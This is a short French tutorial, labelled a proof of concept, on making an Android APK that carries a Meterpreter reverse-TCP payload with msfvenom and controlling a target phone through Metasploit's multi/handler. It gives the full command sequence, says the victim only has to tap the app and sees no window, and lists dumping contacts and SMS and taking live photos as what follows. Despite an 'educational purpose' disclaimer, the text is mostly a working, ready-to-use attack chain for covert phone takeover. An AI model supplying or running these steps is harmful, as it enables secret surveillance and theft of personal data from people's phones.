/ poc

Meterpreter Android

Avertissement :

Ce tutoriel est à but éducatif, nous nous déchargeons de toute utilisation malveillante !!

Contexte :

Création d'un apk android contenant un reverse tcp pour prendre la main à distance sur un téléphone.

Matériel utilisé :

  • Kali
  • Smartphone Android 6.0 Marshmallow

1ere étape :

  • Création de l'application Android
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2 R > /root/Hacked.apk

msfvenom est un module de metasploit permettant de générer notre payload via l'option -p.
Il faut ensuite séléctionner l'adresse IP de notre pc comme hôte locale pour le reverse TCP.
Le tout est chargé dans Hacked.apk.

2eme étape :

  • Envoyer l'apk sur le mobile cible
  • Autoriser l'installation de sources inconnu

3eme étape :

  • Lancement de metasploit
msfconsole
  • Charger le module metasploit
use exploit/multi/handler
  • Charger le reverse tcp
set payload android/meterpreter/reverse_tcp
  • Définir son local host
set LHOST 192.168.1.2
  • Lancer l'exploit
exploit

Il ne reste plus qu'à attendre que la personne clique sur l'application. Aucune fenêtre ne s'ouvre sur le téléphone mais le module se lance bien.
On peut alors lancer des commandes depuis le pc vers le smartphone comme par exemple dumper les contacts, sms, prendre des photos en direct etc...
Pour plus de commande taper help ;)